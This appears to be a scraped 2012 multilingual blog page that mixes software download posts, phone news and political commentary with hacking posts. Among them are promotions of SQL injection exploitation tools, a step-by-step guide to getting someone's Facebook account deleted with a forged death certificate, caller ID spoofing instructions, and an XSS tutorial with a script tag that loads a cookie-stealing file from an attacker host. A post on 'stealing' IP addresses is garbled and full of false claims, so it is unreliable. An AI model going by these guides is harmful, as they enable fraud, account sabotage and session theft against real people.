Latest Post

Sopho Antivirus Home Edition

Written By Unknown on Saturday 30 June 2012 | 15:07





Prometendo ser um aplicativo fรกcil de instalar e simples de usar, o Sopho Antivirus traz a mesma qualidade de outros produtos da SophosLabs, prevenindo a propagaรงรฃo de malware para Mac OS X ou Windows e atuando tambรฉm na eliminaรงรฃo de ameaรงas que tenham conseguido infectar sua mรกquina. 
Ele รฉ um binรกrio universal (Intel e PowerPC) compatรญvel com o Mac OS X 10.4, 10.5 e 10.6, e requer pelo menos 256MB de RAM e 150MB em disco.


DOWNLOAD: LINK

The Mole v0.3 – Automatic SQL Injection Exploitation Tool

Written By Unknown on Friday 29 June 2012 | 07:54

The Mole is an automatic SQL Injection exploitation tool. Only by providing a vulnerable URL and a valid string on the site it can detect the injection and exploit it, either by using the union technique or a boolean query based technique.

Features

  • Support for injections using Mysql, SQL Server, Postgres and Oracle databases.
  • Command line interface. Different commands trigger different actions.
  • Auto-completion for commands, command arguments and database, table and columns names.
  • Support for filters, in order to bypass certain IPS/IDS rules using generic filters, and the possibility of creating new ones easily.
  • Exploits SQL Injections through GET/POST/Cookie parameters.
  • Developed in python 3.
  • Exploits SQL Injections that return binary data.
  • Powerful command interpreter to simplify its usage.
Disclaimer: Usage of The Mole for attacking web servers without mutual consent can be considered as an illegal activity. It is the final user's responsibility to obey all applicable local, state and federal laws. Authors assume no liability and are not responsible for any misuse or damage caused by this program.

You can download The Mole v0.3 here:

Windows – themole-0.3-win32.zip
Linux – themole-0.3-lin-src.tar.gz



A Tax Is a Tax Is a Tax

Written By Unknown on Thursday 28 June 2012 | 14:10



Of course the stock market dropped about 130 points. Twenty new or higher taxes across-the-board are bad for economic growth, bad for job hiring, bad for investors, and bad for families.

A tax is a tax is a tax, according to Judge Roberts. But he forgot to say that if you tax something more, you get less of it.

Presumably Mitt Romney will make this case in a major way. Hopefully he won’t forget that Obamacare is not just a huge tax hike. It’s also a major new spending entitlement that’s already pegged at $2.5 trillion and will increase the federal debt burden much faster than the GDP expands.

In other words, tax, spend, regulate, borrow. The Obama mantra. Romney must go after it -- time and time and time again.

Bankrupting the economy is not exactly a job-creator.



SQL Injection Scanners List !

imgsrc: http://www.insecure.in/images/sql_injection.gif

sqlmap ( http://sqlmap.sourceforge.net/ )
Full support: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.
Partial support for: Microsoft Access, DB2, Informix, Sybase and Interbase.

Safe3 SQL Injector ( http://sourceforge.net/projects/safe3si/files/ )
Full support: MySQL, Oracle, PostgreSQL, MSSQL, ACESS, DB2, Sybase, Sqlite.

SQL Power Injector ( http://www.sqlpowerinjector.com/ )
Supports: Microsoft SQL Server, Oracle, MySQL, Sybase / Adaptive Server and DB2.

Absinthe ( http://www.0x90.org/releases/absinthe/index.php )
Supports: Microsoft SQL Server, MSDE, Oracle, and Postgres.

bsqlbf-v2 ( http://code.google.com/p/bsqlbf-v2/ )
Supports: MySQL, Oracle, PostgreSQL and Microsoft SQL Server.

Marathon Tool ( http://www.codeplex.com/marathontool )
Supports: MySQL, Oracle, Microsoft SQL Server and Microsoft Access.

Havij ( http://itsecteam.com/en/projects.htm )
Supports: MySQL, Oracle, Microsoft SQL Server and Microsoft Access.

pysqlin ( http://code.google.com/p/pysqlin/source/checkout )
Implemented: Oracle, MySQL and Microsoft SQL Server.

BSQL Hacker ( http://labs.portcullis.co.uk/application/bsql-hacker/ )
Implemented: Oracle and Microsoft SQL Server.
Available experimental support for MySQL.

WITOOL ( http://witool.sourceforge.net/ )
Implemented: Oracle and Microsoft SQL Server.

Sqlninja ( http://sqlninja.sourceforge.net/ )
Supports only Microsoft SQL Server.

sqlus ( http://sqlsus.sourceforge.net/ )
Supports only MySQL.

DarkMySQLi16.py ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.

mySQLenum ( http://sourceforge.net/projects/mysqlenum/ )
Supports only MySQL.

PRIAMOS ( http://www.priamos-project.com/ )
Supports only Microsoft SQL Server.

SFX-SQLi ( http://www.kachakil.com/ )
Supports only Microsoft SQL Server.

DarkMySQL ( http://vmw4r3.blogspot.com/ )
Supports only MySQL.

ProMSiD Premium ( http://forum.web-defence.ru/showpost.php?p=12402&postcount=15 )
Supports only MySQL.

yInjector ( http://y-osirys.com/softwares/s-softwares/id10 )
Supports only MySQL.

Bobcat SQL Injection Tool ( http://www.northern-monkee.co.uk/pub/bobcat.html )


WebRaider ( http://code.google.com/p/webraider/ )
Supports only Microsoft SQL Server.
Designed to execute commands on the server (reverse shell).

Pangolin ( http://www.nosec.org/2009/0920/74.html )
Pangolin distributed on a commercial basis, but is also available in a free version with limited functionality.
Implemented: Oracle, Microsoft SQL Server 2000/2005, Sybase, Access, Mysql, DB2 and Informix.

Toolza 1.0 (SQL injection supported DB: Mysql, Mssql, Sybase, Postgresql, Access, Oracle, Firebird / Interbase): http://bug-track.ru/prog/toolza1.0.rar


MySQL> = 4.x: https://forum.antichat.ru/threadnav43966-1-10.html
MySQL 3.x: http://forum.antichat.ru/showthread.php?t=20127
MSSQL: http://forum.antichat.ru/thread15087.html
ORACLE: http://forum.antichat.ru/showthread.php?t=40576
PostgreSQL: http://forum.antichat.ru/thread35599.html
MSAccess: http://forum.antichat.ru/thread50550.html

http://devteev.blogspot.com/2010/01/sql-injection.html
 http://pentestmonkey.net/cheat-sheets/

source: http://esploit.blogspot.com

UK carriers won't offer a subsidized Nokia 808 PureView

If you are a UK resident, hoping to get the 41MP of cameragoodness that is the Nokia 808 PureView at a nicely subsidized price, we have some bad news for you. None of the British carriers will be offering the Symbian smartphone, so getting it SIM-free will be your only option.

O2, Three and Everything Everywhere (which is the company behind the UK branches of Orange and T-Mobile) have all confirmed that they won't be carrying the device and so has Vodafone Britain. Virgin Mobile UK has left the door open for further negotiations with Nokia stating that it won't be offering the Nokia 808 PureView "yet", but you shouldn't get your hopes too high.

It's obvious that carriers prefer to subsidize smartphones running on data-hungry platforms like iOS, Android and Windows Phone and the expensive data plans that go with those, so we guess turning a deaf ear to the Nokia 808 PureView was expected. Symbian is not exactly the preferred OS for those who like to constantly stay connected, so carriers have little return on its investments in it.

So, spending about £500 on a Nokia 808 PureView seems like your only chance of getting the device. Still interested?

Source

Nokia 808 PureView UK pre-orders to ship on June 30

The Nokia 808 PureView pre-orders at UK retailers' sites are finally starting to list launch dates. Amazon UK will be the among the first stores to get it.

Amazon UK has the 808 PureView (black and white) listed for £500 ($780) with a release date of June 30. That's for a SIM-free phone naturally, with VAT included.

Play.com also has the 808 and it's asking £520 for it. They will be releasing the phone on July 2.

Clove UK is less clear on the launch date - the site notes "First stock delayed until mid-late July. Color variants to be confirmed." The price is set at £504.

Then there's Expansys UK, which lists all three color versions (black, white and red) at £500, but there's no launch date given.

We checked the sites of UK carriers for the Nokia 808 PureView but there's nothing there yet.

Nokia Lumia 800 and 710 get Camera Extras, more apps

The Nokia Lumia 900 and Lumia 610 already received some of the updates that Nokia promised (in the US and China at least) at the WP summit and now it's time for the older duo - the Lumia 800 and Lumia 710 - to get their own. There's a little something for the 900 and 610 too.

To be clear, the new apps are available in the US and China for now. They will be released worldwide in July.

Camera Extras include four features - Smart Group Shot (which uses Scalado's technology), Action Shot (which does burst shot), Self timer and Panorama (these two are self-explanatory).

Check out this video for more details on Camera Extras.
The Nokia Lumia 800 and Lumia 710 are getting two other features - Internet sharing (Wi-Fi tethering) and flip-to-silence (muting alarms and ringers by flipping the phone over).

The 900 and 610 already have these features, but there's something new for them as well. It's called contact share, it's going to be available to all Lumia smartphones, and it lets you send and receive Business cards over SMS.

The Play To app, which enables DLNA on all Lumias, is already available for download.

To install the new apps, your Lumia 800 or Lumia 710 will have to be updated to Windows Phone 7.5 (are there even any people who haven’t updated yet?).

Source

No Economic Miracle if Obamacare is Overturned

It may well be that the complex tax-and-regulatory mandates embodied in Obamacare have proven to be a deterrent for business job creation. You hear it all the time from men and women in business -- especially smaller businesses, but large companies too.


However, color me skeptical that business will embark on a hiring binge if the Supremes overturn the Obamacare mandate tomorrow. Why? Because the uncertainty premium about future health-care policy is still going to be high, and it won’t be resolved until well after the election. Businesses will have almost no idea what Congress will propose if the Supreme’s strike down Obamacare.

For example, it’s going to take money and high insurance premiums to cover preexisting conditions. There also are the stay-at-home 26 year olds and the so-called health-care market exchanges among the states. There are many other issues to be resolved, but the big question is: How will they be financed?

Will there be a tax? Will there be regulations?
One thing’s for sure. A pure free-market health-care system is not going to happen. Many Republicans talk about a patient-centered consumer-choice system, which would be great. Give consumers tax credits for the same deductions that businesses now have. That also would be great. Include interstate insurance competition. Another winner. Tort reform. Another plus.

But the fiscal reality for health-care insurance and payouts to doctors in hospitals is going to be up in the air for quite some time. It’s a known unknown. And because of that, I think businesses are still going to sit on their hands until they know with greater certainty what the costs of hiring the extra worker is really going to be.

For the foreseeable future, there’s no economic miracle if the Supremes strike down Obamacare (as I believe they will).



Which is the most popular antivirus software?



In an over-crowded antivirus software market, end and corporate users are often finding it difficult to differentiate between a value-added market proposition, next to the “me too” vendors of solutions. As in every other market segment, any scientific insight into the market share of various vendors offers an invaluable perspective into the market dynamics, what are customers purchasing, and most importantly, are they living in a world of ‘false feeling of security’.

Using a data set consisting of 120,000 data points, researchers from OPSWAT recently released an informative overview of the antivirus market, answering an important question - which is the most popular antivirus vendor?

According to their findings, that’s avast! Free Antivirus, followed by Microsoft Security Essentials and ESET NOD32 Antivirus.

Detailed market share statistics:

Avast - 17.4% worldwide market share
Microsoft - 13.2% worldwide market share
ESET - 11.1% worldwide market share
Symantec - 10.3% worldwide market share
AVG - 10.1% worldwide market share
Avira - 9.6% worldwide market share
Kaspersky - 6.7% worldwide market share
McAfee - 4.9% worldwide market share
Panda - 2.9% worldwide market share
Trend Micro - 2.8% worldwide market share
Other - 11.1% worldwide market share

Microsoft is the market leader in North America, followed by Symantec and AVG. Not surprisingly, the market leading avast! Free Antivirus is relying on the so called “freemium” business model, where the company grows and gains market share by offering a free alternative of their software, and earns revenue thanks to the successful conversion of free users to paid ones. Earlier this year, the company announced that it has 150 million active users worldwide, a clear indication of a working “freemium” business model.

What do you think? Is antivirus software still relevant in the age of Stuxnet, Duqu and Flame, the so called poster kids of the DIY targeted attack toolkits and weaponized malware releases? Do think free antivirus is offering a ‘false feeling of security’ compared to subscription based license models?

Comodo Antivirus para Mac

Written By Unknown on Wednesday 27 June 2012 | 15:07





 รฉ de facil instalaรงรฃo e configuraรงรฃo, possui atualizaรงรตes automรกticas on-line e remove todos os vรญrus conhecidos atualmente. As definiรงรตes de vรญrus sรฃo baixadas e atualizadas automaticamente de acordo com a agenda configurada dentro do programa ou com apenas um clique no botรฃo updater
Uma vez instalado, Comodo AntiVรญrus fica silenciosamente na barra de sistema, defendendo seu  computador eficiรชncia dos รบltimos ataques de vรญrus. Ele รฉ bastante leve e nรฃo deixa o seu computador lento, nem ocupa excessivamente a memรณria ou HD.
Algumas de suas caracterรญsticas sรฃo:
  • Detecta e elimina vรญrus de ambientes e redes
  • Protege constantemente o acesso em tempo real
  • A anรกlise intercepta ameaรงas desconhecidas
  • Bloqueia um malware antes de ser publicado
  • Diariamente, atualizaรงรตes automรกticas de vรญrus definiรงรตes
       
DOWNLOAD: LINK

UnRarX 2.2





UnRar X 2.2 รฉ uma aplicativo para Mac OS X que permite descomprimir arquivos RAR e ainda com a caracterรญstica de poder recuperar arquivos do mesmo formato que estejam danificados.
Para descompactar um arquivo no formato RAR, o utilizador deve apenas arrastar e soltar o RAR sobre a janela ou icon do UnRar X, automaticamente descomprime.
 DOWNLOAD: LINK


Safari AdBlock








Safari Adblock รฉ uma extensรฃo para Safari 5  que melhora o sistema de proteรงรฃo contra 
propagandas e janelas indesejadas, que pulam na sua tela enquanto vocรช estรก navegando pela net.
A extensรฃo bloqueia, inclusive, propagandas em flash que passeiam pela suas pรกginas e sรฃo muito chatas para fechar.
Bloqueie os indesejรกveis anรบncios e tenha uma navegaรงรฃo mais rรกpida e segura com esta simples extensรฃo.

DOWNLOAD: LINK

Download, Install Qflash Flash Maker Untuk Ubuntu Beserta Tutorial


Aplikasi Flash maker di Linux yang ada saat ini, belumlah cukup sepadan dari segi fitur dengan aplikasi Flash Maker di lingkungan desktop Windows seperti Flash MX. Namun, untuk kebutuhan dasar membuat animasi flash, aplikasi Flash Maker yang ada di Linux sudah bisa memenuhi kebutuhan tersebut. Bahkan, aplikasi Flash Maker di Linux memiliki satu keunggulan sendiri yaitu sangat ringan dan hemat memori.

Salahsatu aplikasi Flash Maker di Linux yang cukup sederhana dan mudah digunakan adalah Qflash. Walau proyek Qflash telah tidak lagi dilanjutkan, akan tetapi aplikasi tersebut masih bisa digunakan di desktop Linux saat ini dan tetap fungsional. Oleh karenanya, saya memaket paket Qflash ke dalam paket installer debian agar mudah diinstalasi oleh para pengguna Debian/Ubuntu Linux. Ohiya, agar jangan sampai lupa, paket Qflash memiliki ketergantungan terhadap paket libqt3-mt dan libstdc++5, jadi sebelum mendownload dan menginstalasi paket Qflash, pastikan kedua paket tersebut telah terinstalasi di sistem Ubuntu / Debian anda. Jika anda memakai Gdebi, dependensi akan otomatis di instalkan dalam proses instalasi, namun bila tidak maka anda harus menginstalasi kedua paket tersebut terlebih dahulu :

sudo apt-get install libqt3-mt libstdc++5

Atas request seorang sahabat, maka saya juga membuatk satu tutorial sederhana membuat animasi flash di Linux dengan memanfaatkan Qflash dalam bentuk pdf. Berikut ini paket Qflash dalam format debian beserta tutorial sederhananya yang bisa anda download. Semoga bermanfaat. Maju terur Linux :)

Installer Qflash dalam format Debian

Tutorial Sederhana Qflash Dalam PDF

WiFi Hack Ultimate AIO (2011)

Here's why current WP phones won't get Windows Phone 8

Written By Unknown on Tuesday 26 June 2012 | 10:08

Microsoft caused a lot of excitement when they announcedWindows Phone 8, but also a good deal of disappointment when it became clear that the new OS won't be coming to the current crop of Windows Phone devices.

There's a reason for that - the two OSes may look similar on the outside, but they are vastly different on the inside. The new core that enables so many cool features (multiple CPU cores, better graphics) is shared with Windows 8 RT (based on Windows NT) and not Windows Phone 7 (based on Windows CE, same as Windows Mobile).

Microsoft’s senior marketing manager for Windows Phone, Greg Sullivan, says that it's not impossible to port WP8 on older devices, but the cost of doing that would be very high and the benefit very little - WP8 enables multi-core support, higher resolution screens, NFC, microSD card support and so on, none of which will make a difference on the legacy hardware.

What they are getting (as part of the Windows Phone 7.8 update) is the new start screen - it's the most noticeable change in the OS and will actually benefit the current Windows Phone smartphones.

Users who move to the new version of the OS will get to keep using their Windows Phone 7 appsas those will work on WP8. There's no backwards compatibility for the newly developed WP8 apps though and there's nothing that can be done about it - for example, the Adreno 205 just won't cut it for games intended for a Snapdragon S4 (which packs an Adreno 225 or 305).

Source

Amazon gives Lumia 900 for $0.01, AT&T contract still required

The US Amazon is selling Nokia Lumia 900 for AT&T for 1 cent once again, and this time the offerisn't even limited to new users only.

Nokia Lumia 900 for AT&T offers LTE connectivity and is the company’s current WP flagship. The fact that it won't get to taste Windows Phone 8 is pretty damaging for the Lumia 900 market prospects, but maybe this promotion and the consolation WP7.8 update will help.



Still WP8 smartphones probably won't be on the market for at least another four or five months so if are about to sign an AT&T contract, you might as well take Nokia's offer for free lifetime navigation, a 4.3" AMOLED and a super cool polycarbonate unibody.

Source | Via

Check out a Lumia 900 running the new WP 7.8

A Senior Manager over at Redmond's Microsoft campus got hold of a Nokia Lumia 900 running avery early build of Windows Phone 7.8 and decided to tape the new homescreen and upload it to YouTube.

He demonstrates the live tiles resizing in all three modes - small, medium and large. Doing so also changes the amount of information that the tile gives you. For example a small SMS live tile gives you only the number of unread messages, while a large one also gives you a quick preview.
Microsoft has also posted a dedicated page, detailing the new features that will come to existing 7.5 users via the WP 7.8 update - you can find it here (note that an account is needed to view it).

Among the highlights are the new Start screen, the currently around 100 thousand apps for WP and information about the Lumia-exclusive camera enhancements and a new way of sharing contacts and track data usage.

Source | Via

One-on-One with Marco Rubio


The run-up to the presidential election is really a debate about growth and taxes, Sen. Marco Rubio of Florida told CNBC on Monday.

“Growth helps the debt be more manageable, unemployment, all of these things,” he said in an interview on “The Kudlow Report.”

“Tax increases do not lead to growth,” he said. “The reason why I oppose increases in taxes is not some religious objection, or even an ideological one. It is the knowledge that increasing taxes discourages growth.”

Rubio said that taxes remove money that was going to be spent into the economy. “When the government spends that dollar, they’re going to be a lot less efficient, a lot less stimulative,” he said.

Rubio, who is being considered a vice presidential running mate by presumptive Republican nominee Mitt Romney, also spoke about the debt crisis, health care and Arizona’s controversial immigration law, on which the U.S. Supreme Court ruled Monday.

Asked by Larry Kudlow whether there could be a compromise like the one former Florida Gov. Jeb Bush mentioned in an earlier appearance — $10 of spending cuts for every $1 of revenue increases — Rubio held firm.

“I’ve always believed that was a false choice. The goal is not to give each side what they want,” Rubio said. “The goal is to solve the problem.”

Hours after the nation’s highest court upheld one of the most controversial parts of Arizona’s immigration law — that police can make checks for immigration status — Rubio agreed with the decision. “I’ve always believed the Arizona immigration law was constitutional,” said Rubio, the son of Cuban immigrants, even as he admitted “mixed feelings” about it initially.

Part of the law that was upheld instructs law enforcement officials to verify the immigration status of anyone they detain.

“I understand why Arizona did it. I understand why the people of Arizona are frustrated. I believe they have the 10th Amendment right to pass that law,” he said.

But the federal government, Rubio added, needed to fix the problem with a few steps: “Secure the border, have an electronic verification system in place and modernize our legal immigration so it reflects the 21st century needs of our country.”

Weighing in on health care, Rubio said he would like to see the Obama administration’s Affordable Care Act be replaced with a free-market system in which insurance companies compete for consumers’ dollars.

“I think once there’s more choice, once the consumeris in charge of their health care dollars, the market’s going to meet that demand. Now all of a sudden, companies are going to try to figure out how to make themselves more attractive so that you choose them over somebody else. Right now they don’t have to do that,” he said.

“From the point of view of the marketplace, insurance companies, if they want my business, if I control my health care dollars, and I get to choose from any insurance company I want, I’ll go to you and say, ‘Hey guys, I would love to buy your insurance, but I have a kid who is sick. Will you cover them as well? Because this other guy will cover them, and I’ll go with them if you don’t do the same.’ I think that now the consumer is empowered to make that argument.”

Rubio said that for chronically ill Americans, state governments could create high-risk pools to provide insurance.

“I think that’s the one focused, narrow place where government — state government — can be helpful to folks,” he said.

Rubio was not asked about any possible run for vice president. On NBC’s “Meet the Press” on Sunday, Rubio declined to answer questions about it.

Close Any Facebook Account In 24 Hours



Just Follow the steps:
Step 1 - Go to this url:
http://www.facebook.com/help/contact.php...m=deceased

So this is the Url we will use to Report our slave. This Form allows you to report a deceased person (someone who is dead).

Step 2 - Complete the Fields:

Explain:
Full Name: Your Victims Full name(Name last name)
Date of birth: Go at his profile and click at Info tab and get his date of birth.
Account Email Addresses: Do the same thing, go to his profile and click on info tab and get his email addresses.
Networks: Again,go to his profile and click on Info tab and get his networks, copy them and paste in the form.
Web address of profile you would like to report: Just go to his profile and copy the link in the address bar.
Relationship to this person: To make more believable select Immediate Family.
Requested Action: Remove Profile
Proof Of Death: This is the hardest part of this form. Now to make a proof of a death just Google in your language a "Death Certificate" or "Certificate of a Death". It doesn't matters from what country you are, just use this Italian certificate and open up photoshop or whatever Image
Editor and just write in a blank field:
Annunciamo il morte di [name goes here]. Save your image to desktop and upload it in one of the Image
Free Hosting like: http://imageshack.us
And it's done ;)... Italian Death Certificate:
Additional Information: Write what you want, just write that you are in his/her family and you would like to close his/her Facebook account because you won't like that when he is dead, his Facebook is opened.

Step 3 - Click on Submit and then a message will appear:
Your injury was submitted at Facebook Team .. So the meaning is that one of the mod's of Facebook will review your report and will do the right decision. It works in most of the times. I closed a few ones.

GoodBye DDos Tool

IP Addresses (Internet Protocols) and how to steal them

IP stands for Internet Protocols. An IP address is the address for servers and a person's computer who is connected to the internet. Everyone on the internet has an IP address, and once you find out what it is, you know exactly where they are, and you can begin to hack them.

Internet Protocols Addresses are usually made up of random numbers seperated by dots. Every IP address is unique, no one can have the same one. This is why it is very important that you're careful when typing, you do NOT want to accidentally hack the wrong person/network.
  • 66.17.44.186
  • 81.73.50.42
  • 192.168.1.1
  • 127.0.0.1
  • 84.10.1.5982
  • 17.44.186
  • 816.83.337.04
Obtaining a target's IP is address is the first step to prepare for an attack. Explained below are methods of obtaining a victim's IP address.Ping - the easiest way to steal an IP
Ping is a tool used to endlessly make requests to a server or another person. It works with both IP address or domain names. Domain names are the addresses that you type in to go to a website. Domain names are easier to remember, which is why the internet was invented.
Either way, by pinging a site, you can easily over-load it with requests, and at the same time obtain the IP. Ping is supported in Microsoft DOS, as shown below:
As you see, the hacker here is using Windows XP (a good choice), and in order to get the IP of mediacollege.com, the only thing he had to do was open up a DOS prompt and type inping mediacollege.com. Upon doing so, mediacollege.com was instantly hit with 4 requests which distracted their server long enough in order for Ping to steal the IP address.

source: http://www.elite-hackers.com

How to Spoof Caller ID ? Caller ID Spoofing

Written By Unknown on Monday 25 June 2012 | 08:40




Caller ID spoofing is the act of making the telephone network to display any desired (Fake) number on the recipient’s Caller IDdisplay unit instead of the original number. The Caller ID spoofing can make a call appear to have come from any phone number that the callerwishes.Have you ever wondered how to perform Caller ID spoofing? Read on to know more information on Caller ID spoofing and find out how it is performed.
Unlike what most people think, an incoming call may not be from the number that is displayed on the Caller ID display unit. Because of the high trust that the people have in the Caller ID system, it is possible for the caller to easily fool them and make them believe that the number displayed on the Caller ID display is real. This is all possible through Caller ID spoofing.




How to Spoof Caller ID? 

You can easily spoof any Caller ID using services like SpoofCard. Inorder to use the spoofcard service, you need to pay in advance and obtain a PIN (Personal Identification Number) which grants access to make a call using the Caller ID spoofing service. Once you have purchased the service, you will be given access to login to your SpoofCard account. To begin with, you need to call the number given by  SpoofCard and enter the PIN. Now you will be given access to enter thenumber you wish to call and the number you wish to appear as the CallerID. Once you select the options and initiate the calling process, the call is bridged and the person on the other end receives your call. The receiver would normally assume that the call was coming from a different phone number ie: the spoofed number chosen by you - thus tricking the receiver into thinking that the call was coming from adifferent individual or organization than the caller’s. In this way itis just a cakewalk to spoof Caller ID and trick the receiver on the other end. Thus you neither need to be a computer expert nor have any technical knowledge to perform Caller ID spoofing. For more informationon SpoofCard service visit the following link.

SpoofCard


How Caller ID Spoofing works?

Caller ID spoofing is done through various methods and using different technologies. The most commonly used technologies to spoofCaller ID is VOIP (Voice Over IP) and PRI (Primary Rate Interface) lines.
Today most VOIP systems provide an option for it’s users to enter whatever number they want in the calling party field and this number is sent out when they make a call. Hence it is easily possible for any user to spoof Caller ID provided they have a VOIP system and know how to properly configure it to spoof the Caller ID. However sites like SpoofCard provide an easy and cheap spoofing services for those who aren’t using VOIP systems that they can configure themselves.

Caller ID spoofing is possible and being performed right from the days Called ID system was introduced. However most people are unawareof the fact that it is possible to spoof  Caller ID and make any numberto be displayed on the receiver’s end. In the past, Caller ID spoofingservice was mostly used by telemarketers, collection agencies,law-enforcement officials, and private investigators but today it is available to any Internet user who wish to perform Caller ID spoofing.



source: http://mmcracker.multiply.com

Cross Site Scripting(XSS) Complete Tutorial for Beginners

Written By Unknown on Sunday 24 June 2012 | 14:01




What is XSS?
XSS is stands for Cross site Scripting.  Don't confuse this with CSS(Cascading Style sheet).  It is one of the Top Web Application Vulnerability.  This vulnerability allows the attacker to insert client side scripts(especially Javascript) .  Using this vulnerability an attacker can inject malicious codes, leads to malware attack, phishing and session hijacking. 

XSS Vulnerability and Injection:

Step 1: Finding Vulnerable Website
As usual an attacker will search in google using the google Dork. For example, he will search for "search?q=" or "search.php?q= . This will results plenty of website. There are plenty of Google dork, hackers find their own dork and search.  if you have bad luck, it will be your site. 

Step 2: Testing the Vulnerability
In order to test the vulnerability, we need  to find a POST or Get parameter. Confused ? It is just input fields that will be send to server.  For example search query,username ,password . 
There are two ways to test the vulnerability:

Method 1: injection in form box(especially search box)
An attacker can enter the malcious script inside the search box and click the search button.  This will lead to run the malicious script inside that website


Method 2: Injecting in url
In this method , there may  not any form box.  They use the url field instead.
For Example:

htp://vulnerablewebsite/search?q=malicious_script_goes_here
for testing purpose, insert the
<script>alert('hi');</script> 
in the input fields.

For example:
using method 1, you can enter the code in search box and click the search button.
or
using method 2, you can enter the code in url like this:
http://vulnerablewebsite/search?q=<script>alert('hi');</script>

if it shows "Hi" message in popup box, then it is vulnerable to XSS.


step 3: Injecting Malicious Scripts
After find vulnerable site, an attacker will inject malicious scripts. It may lead to stealing cookies and malware attack as said before.

Let us assume an attacker has cookie stealing script  in his website.  for instance, his malicious script url is

http://attackerSite/malicious.js
He can inject now the malcious script inside the vulnerable site like this:
<script src=http://attackerSite/malicious.js></script>
When visitors loads into website, the malicious start to run and cause to cookie stealing.

Types of XSS Based on persisting capability:

There are two types of XSS based on persisting Capability namely Persistent and Non-Persistent.

Persistent XSS:
This is risky XSS vulnerability , it stores the data provided in server.  So the malicious script injection is permanently stored in web application.   It will be shown to other users when they visit the site.
if the attacker inject malware , then regular users of that website also infected .

For example:
Some sites may store the search query in order to track the user interest. This results in permanent storage of XSS.

Non-Persistent XSS:
Also referred as Reflected XSS .  In this case, the storage of malicious script is temporary one(means it won't be shown to other users).  Attacker may trick users to visit the URL with injection.  As they are regular user of that site, they will trust the link.  It leads to stealing cookies.

For example:
When you search in some site, it will return the result with your searching string. This cause to run the malicious code temporarily.

What can an attacker do with this Vulnerability?

  • Stealing the Identity and Confidential Data(credit card details).
  • Bypassing restriction in websites.
  • Session Hijacking(Stealing session)
  • Malware Attack
  • Website Defacement.
  • Denial of Service attacks(Dos)
Disclaimer:This article is for educational purpose only.  In order to Pentesters/Ethical hackers understand  the web application vulnerability, this article is written.   Also this article will educate webmaster so that they can prevent them self. 


Backlink- http://www.breakthesecurity.com
source: http://www.defencehacker.in

Nokia 808 PureView gets its first firmware update

It's just been over a week since the Nokia 808 PureView went on sale and Nokia has already given the phones its first firmware upgrade.




Although an official change log is not available, but according to All About Symbian, the update brings with it improvement in scrolling performance, quicker saving of the 38 megapixel images, smoother auto-rotation and other performance enhancements and bug fixes.

The v112.020.0310 update is now available over-the-air and can be downloaded directly on to your phone, or you can download it by connecting your phone to Nokia Suite.

Click here to read the full review of the Nokia 808 PureView.

Source

Nokia outs exclusive Camera Extras app for Lumia phones

Nokia has released a special app for its Lumia series of smartphones. Currently available on the Windows Phone Marketplace, the Camera Extras app will give users four new shooting modes for their devices.



The new modes are Smart Group Shot, Action Shot, Self-timer and Panorama shot. The first one allows you to capture burst shots of a group of people and then automatically chooses the best one judging by face expressions, while the second allows you to capture fast-moving objects improvingshooting speed. The other two are quite self-explanatory.

For now only users in China and the United States are bound to get the update. Other countries will follow later in July. Head to the Windows Phone Marketplace to get the juicy app now.

Source | Via
 
Support : Creating Website | Johny Template | Mas Template
Copyright © 2011. Turorial Grapich Design and Blog Design - All Rights Reserved
Template Created by Creating Website Published by Mas Template
Proudly powered by Blogger